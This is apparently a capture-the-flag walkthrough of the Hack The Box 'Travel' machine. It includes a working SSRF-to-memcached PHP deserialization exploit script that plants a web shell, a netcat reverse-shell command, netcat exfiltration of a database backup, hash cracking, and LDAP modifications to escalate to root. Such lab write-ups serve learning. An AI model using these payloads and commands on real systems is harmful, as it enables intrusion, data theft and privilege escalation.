NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 19:52 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:52
Completed NSE at 19:52, 0.00s elapsed
Initiating NSE at 19:52
Completed NSE at 19:52, 0.00s elapsed
Initiating NSE at 19:52
Completed NSE at 19:52, 0.00s elapsed
Initiating Ping Scan at 19:52
Scanning 10.10.10.189 [4 ports]
Completed Ping Scan at 19:52, 0.65s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:52
Scanning ldap.travel.htb (10.10.10.189) [1000 ports]
Discovered open port 22/tcp on 10.10.10.189
Discovered open port 80/tcp on 10.10.10.189
Discovered open port 443/tcp on 10.10.10.189
Completed SYN Stealth Scan at 19:52, 3.76s elapsed (1000 total ports)
Initiating Service scan at 19:52
Scanning 3 services on ldap.travel.htb (10.10.10.189)
Completed Service scan at 19:52, 14.28s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against ldap.travel.htb (10.10.10.189)
Retrying OS detection (try #2) against ldap.travel.htb (10.10.10.189)
Retrying OS detection (try #3) against ldap.travel.htb (10.10.10.189)
Retrying OS detection (try #4) against ldap.travel.htb (10.10.10.189)
Retrying OS detection (try #5) against ldap.travel.htb (10.10.10.189)
Initiating Traceroute at 19:52
Completed Traceroute at 19:52, 0.56s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 19:52
Completed Parallel DNS resolution of 2 hosts. at 19:52, 0.61s elapsed
NSE: Script scanning 10.10.10.189.
Initiating NSE at 19:52
Completed NSE at 19:53, 14.29s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 3.08s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for ldap.travel.htb (10.10.10.189)
Host is up (0.30s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.17.6
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB
443/tcp open ssl/http nginx 1.17.6
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.6
|_http-title: Travel.HTB - SSL coming soon.
| ssl-cert: Subject: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Subject Alternative Name: DNS:www.travel.htb, DNS:blog.travel.htb, DNS:blog-dev.travel.htb
| Issuer: commonName=www.travel.htb/organizationName=Travel.HTB/countryName=UK
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-23T19:24:29
| Not valid after: 2030-04-21T19:24:29
| MD5: ef0a a4c1 fbad 1ac4 d160 58e3 beac 9698
|_SHA-1: 0170 7c30 db3e 2a93 cda7 7bbe 8a8b 7777 5bcd 0498
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/5%OT=22%CT=1%CU=35636%PV=Y%DS=2%DC=T%G=Y%TM=5F01E24C
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F5%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=A)ECN(R
OS:=N)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%
OS:CD=S)
Uptime guess: 34.417 days (since Mon Jun 1 09:52:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=245 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 555.47 ms 10.10.14.1
2 555.59 ms ldap.travel.htb (10.10.10.189)
NSE: Script Post-scanning.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.62 seconds
Raw packets sent: 1305 (64.070KB) | Rcvd: 1185 (50.866KB)
ENUMERATION
In nmap scans we know that we have 2 other domains:
- travel.htb
- blog.travel.htb
- blog-dev.travel.htb
First add these domains in /etc/hosts
TRAVEL.HTB
BLOG.TRAVEL.HTB
BLOG-DEV.TRAVEL.HTB
So here I fuzzed every domain but got interesting ones from blog-dev.travel.htb
┌─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #wfuzz -u http://blog-dev.travel.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt --hc 404
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://blog-dev.travel.htb/FUZZ
Total requests: 4614
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 403 7 L 9 W 154 Ch ""
000000009: 200 1 L 2 W 23 Ch ".git/HEAD"
000000090: 404 7 L 11 W 154 Ch "_tmp" ^C
Finishing pending requests...
So here we know that we have to use git method to get all files
So i useed a tool here gitdumper : LINK
┌─[root@liquid]─[~/Desktop/HTB/travelC/GitTools/Dumper]
└──╼ #./gitdumper.sh http://blog-dev.travel.htb/.git/ ../../blog.travel.htb
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[*] Destination folder does not exist
[+] Creating ../../blog.travel.htb/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/03/13850ae948d71767aff2cc8cc0f87a0feeef63
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/b0/2b083f68102c4d62c49ed3c99ccbb31632ae9f
[+] Downloaded: objects/ed/116c7c7c51645f1e8a403bcec44873f74208e9
[+] Downloaded: objects/2b/1869f5a2d50f0ede787af91b3ff376efb7b039
[+] Downloaded: objects/30/b6f36ec80e8bc96451e47c49597fdd64cee2da
┌─[root@liquid]─[~/Desktop/HTB/travelC/GitTools/Dumper]
└──╼ #cd ../../
Here we have downloaded evry file from git :
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb/.git]
└──╼ #cat index
DIRC^���\�^���\�
\:�����l||Qd_�@;��Hs�� README.md^���-�rc^���-�rc
\<����
�+i����xz��vﷰ9rss_template.php^�|�UH]^�I�;]�X
\=����k0��n���dQ�|IY�d���
template.phpTREE3 0
It looks like that we have some files deleted which need to be recover
So to that we simply need to use a git command
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
└──╼ #git restore .
┌─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
└──╼ #ls
README.md rss_template.php template.php
Here we have these 2 files which we need to analyse :
Things we came to know from these files are:
Their is memcache available
$simplepie->set_cache_location(‘memcache://127.0.0.1:11211/?timeout=60&prefix=xct_’);
Their is get parameter
function url_get_contents ($url) {
$url = safe($url);
$url = escapeshellarg($url);
$pl = "curl ".$url;
$output = shell_exec($pl);
return $output;
}
Their is directory where file is present and this directly looks like PHP serialization
private function init(string $file, string $data)
{
$this->file = $file;
$this->data = $data;
file_put_contents(__DIR__.'/logs/'.$this->file, $this->data);
}
}
This is place where get parameter would work
$url = $_SERVER['QUERY_STRING'];
if(strpos($url, "custom_feed_url") !== false){
$tmp = (explode("=", $url));
So here we know that their is url parameter in custom_feed_url dir where it could help to get us shell
So when we visit this url :
http://blog.travel.htb/awesome-rss/?custom_feed_url=10.10.14.12
We get response in such format :
┌─[root@liquid]─[~/Desktop/HTB/travelC/blog.travel.htb]
└──╼ #python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.189 - - [05/Jul/2020 22:03:03] "GET / HTTP/1.1" 200 -
10.10.10.189 - - [05/Jul/2020 22:03:04] "GET /? HTTP/1.1" 200 -
now we need to use memcache , php des. , and SSRF to get rev shell
So to do that we have tool called gopher
WHAT WE ARE GOING TO DO TO GET REV SHELL:
So we will generate payload using gopher through which we can execute commands then we will triger that payload using above url parameter. After which we will be going to that file where our payload is stored and will be executing shell commands
First we will try out gopher without payload and remember to change 127.0.0.1 to 127.00.0.1 because simple local host will give you error as we have seen in above template file
┌─[root@liquid]─[~/Desktop/HTB/travelC/Gopherus]
└──╼ #python gopherus.py --exploit phpmemcache
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
This is usable when you know Class and Variable name used by user
Give serialization payload
example: O:5:"Hello":0:{} : O:5:"Hello":0:{}
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:11211/_%0d%0aset%20SpyD3r%204%200%2016%0d%0aO:5:%22Hello%22:0:%7B%7D%0d%0a
After everything done, you can delete memcached item by using this payload:
gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a
-----------Made-by-SpyD3r-----------
Here we can see that we have succesfully echo hello in page
So now we need to generate a payload which will store php shell executing cmd script in file and then it will save that file in log directory
So To do that we will have payload which looks like :
O:14:”TemplateHelper”:2:{s:4:”file”;s:’+str(len(file))+’:”‘+file+'”;s:4:”data”;s:31:”<?php system($_REQUEST[“cmd”]);”;}
What this payload is doing is that it is going to store php script in given file. Here file is named as liquid.php with php extension
But if you see that gopher generates spider text something in its payload whereas we need xct_4e5612ba079c530a6b1f148c0b352241 over their so tp do that we will have script like this
Whole payload looks like this :
CODE :
‘O:14:”TemplateHelper”:2:{s:4:”file”;s:’+str(len(file))+’:”‘+file+'”;s:4:”data”;s:31:”<?php system($_REQUEST[“cmd”]);”;}’
Here we are adding xct part in front of this code
payload = “%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 ” + str(len(code)) + “%0d%0a” + code + “%0d%0a”
Here we are URL encoding this code
encodedpayload = urllib.quote_plus(payload).replace(“+”,”%20″).replace(“%2F”,”/”).replace(“%25″,”%”).replace(“%3A”,”:”)
Here we are adding gopher url in front of that encoded url:
return “gopher://127.00.0.1:11211/” + encodedpayload
So whole script to do that is this:
import requests
import urllib
LHOST="10.10.14.12"
file = "liquid.php"
url = "http://blog.travel.htb/"
def payload ():
code = 'O:14:"TemplateHelper":2:{s:4:"file";s:'+str(len(file))+':"'+file+'";s:4:"data";s:31:"<?php system($_REQUEST["cmd"]);";}'
#md5(md5("http://www.travel.htb/newsfeed/customfeed.xml%22):%22spc%22) = 4e5612ba079c530a6b1f148c0b352241
payload = "%0d%0aset xct_4e5612ba079c530a6b1f148c0b352241 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a"
encodedpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":")
return "gopher://127.00.0.1:11211/" + encodedpayload
payload = payload()
print "[+]payload is=: " + payload
print "[+] Requesting using ssrf in phpmemcache"
ssrf_url = url+"awesome-rss/?debug=yes&custom_feed_url="+payload
print ssrf_url
r = requests.get(ssrf_url)
print "[+] Its time for deserialization"
r = requests.get(url+"awesome-rss/")
payload_url = url + "wp-content/themes/twentytwenty/logs/"+file
print payload_url
while True:
print payload_url
r = requests.get(payload_url)
print(r.status_code)
if r.status_code == 200:
break;
print "[+] You are ready to go"
print "[+] Run commands on web shell now"After running thisb script just go to the given URL to execute command:
GETTING LOW PRIV SHELL
So after executing simple command : nc 10.10.14.12 9001 -e /bin/bash
You will get shell as this
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.189] 57608
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html/wp-content/themes/twentytwenty/logs
So here we have a file in /opt/wordpress/ folder which looks more suspicious.
Transfer that file to your own machine.
VICTIMS MACHINE
backup-13-04-2020.sql
nc 10.10.14.12 9003 < backup-13-04-2020.sql
ATTACKERS MACHINE
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #nc -lnvp 9003 > backup-13-04-2020.sql
listening on [any] 9003 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.189] 40198
After checking these files i got 2 hashes from this from last lines which I Passed to hashes.txt and run them against hashcat
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #hashcat -m 400 -a 0 hash ../../THM/Wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...
<---->
$P$B/wzJzd3pj/n7oTe2GGpi5HcIl4ppc.:1stepcloser
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: hash
Time.Started.....: Sun Jul 5 20:58:28 2020 (1 hour, 0 mins)
Time.Estimated...: Sun Jul 5 21:58:44 2020 (0 secs)
Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4170 H/s (4.98ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 28688768/28688768 (100.00%)
Rejected.........: 0/28688768 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:8064-8192
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Started: Sun Jul 5 20:58:24 2020
Stopped: Sun Jul 5 21:58:44 2020
lynik-admin : 1stepcloser
SSH LOGIN
┌─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #ssh lynik-admin@10.10.10.189
lynik-admin@10.10.10.189's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)
System information as of Sun 05 Jul 2020 05:12:38 PM UTC
System load: 0.01
Usage of /: 46.5% of 15.68GB
Memory usage: 12%
Swap usage: 0%
Processes: 203
Users logged in: 0
IPv4 address for br-836575a2ebbb: 172.20.0.1
IPv4 address for br-8ec6dcae5ba1: 172.30.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.10.189
Last login: Sun Jul 5 15:35:41 2020 from 10.10.14.12
lynik-admin@travel:~$ id
uid=1001(lynik-admin) gid=1001(lynik-admin) groups=1001(lynik-admin)
lynik-admin@travel:~$ ls
user.txt
lynik-admin@travel:~$ cat user.txt
0b08xxxxxxxxxxxxxxxxxxxx5292af9
lynik-admin@travel:~$
Here we go with user flag
After enumerating I saw file mainly related to ldap So I went for more enumeration for ldap and got these files :
-rw-r--r-- 1 lynik-admin lynik-admin 82 Apr 23 19:35 .ldaprc
-rw------- 1 lynik-admin lynik-admin 861 Apr 23 19:35 .viminfo
So in these files I got BINDPW : Theroadlesstraveled
So I ran this command to get users on ldap server:
ldapsearch -x -D “cn=lynik-admin,dc=travel,dc=htb” -w Theroadlesstraveled
So here I know that i am admin of ldap so i can add modify users from ldap
So just create a small ldif file where we will be modifying commmands for user and giving it access equal to root
liquid.ldif
dn: uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
replace: homeDirectory
homeDirectory: /root
-
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDgs99wAYJpE1eza90oIKZOe0TmcPXH4bzeiHArtwwbHJZFOWKLY15GO2L5s9JAiVlhn/VWEMLYM9QR+0kh4FPQXHDdb8eCtXfI6nkDIzcou0Hs3kAjpMUSgPuRhBGQcWs9o0gvsZ6kVGTZd9m0b4aXAvXa3gzxxxGJ5MCHKnj5DsKv/Xjr0/ooF6GOoQXMeRHE9KjgQNGSkjpkVcZlyMMAF1c/FcnB0q1fxnfimKGnrq4DA/a0jZN3Raj8yRIImaF7FppgGyNVc6UrvOt7D9DHg2f2eGUU/bFW5Clvcrkg3UIpdYqLMHMqknD9o8PshSiMsiS5s/8dwh3/6amM5YhMgeyoOBhJCIy8RwekI7ik014w8KeKPkwCJ6BgHUQ0mN0oftbO/aj7c38tI04BySM2zbLpVs+TSvs74qPzAI1iDcqCGWijMQJptLVHkqbYO9g4wudVo7ukcCZf2iDqS+vZEwSuae3EknGXbv0v5u4NdmAp6fyYWmrsm58FW2Ba6qk= root@liquid
-
replace: userPassword
userPassword: liquid
-
replace: gidNumber
gidNumber: 27
Here we will be changing user johnny access from low to root by allocating :
- HOME (to give everything whatever root has access to)
- GID 27 (to add this user in sudo group)
- USERPASSWORD (to change password of user)
- SSHPUBLICKEY (too add ssh publick key to authen. with our private key)
Here You have to generate SSH key in your own machine without password for better understanding and use public key in above script
Now lets run this command :
lynik-admin@travel:~$ ldapmodify -x -D "cn=lynik-admin,dc=travel,dc=htb" -w Theroadlesstraveled -f liquid.ldif
modifying entry "uid=johnny,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"
lynik-admin@travel:~$
After that run this command on your machine
┌─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #chmod 600 id_rsa
┌─[✗]─[root@liquid]─[~/Desktop/HTB/travelC]
└──╼ #ssh -i id_rsa johnny@10.10.10.189
Creating directory '/home@TRAVEL/johnny'.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)
System information as of Sun 05 Jul 2020 05:24:46 PM UTC
System load: 0.0
Usage of /: 46.5% of 15.68GB
Memory usage: 13%
Swap usage: 0%
Processes: 205
Users logged in: 1
IPv4 address for br-836575a2ebbb: 172.20.0.1
IPv4 address for br-8ec6dcae5ba1: 172.30.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.10.189
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sun Jul 5 16:05:06 2020 from 10.10.14.12
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
johnny@travel:~$ sudo whoami
[sudo] password for johnny:
root
johnny@travel:~$ sudo cat /root/root.txt
81abxxxxxxxxxxxxxxxxxxxx6c3c8
johnny@travel:~$
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
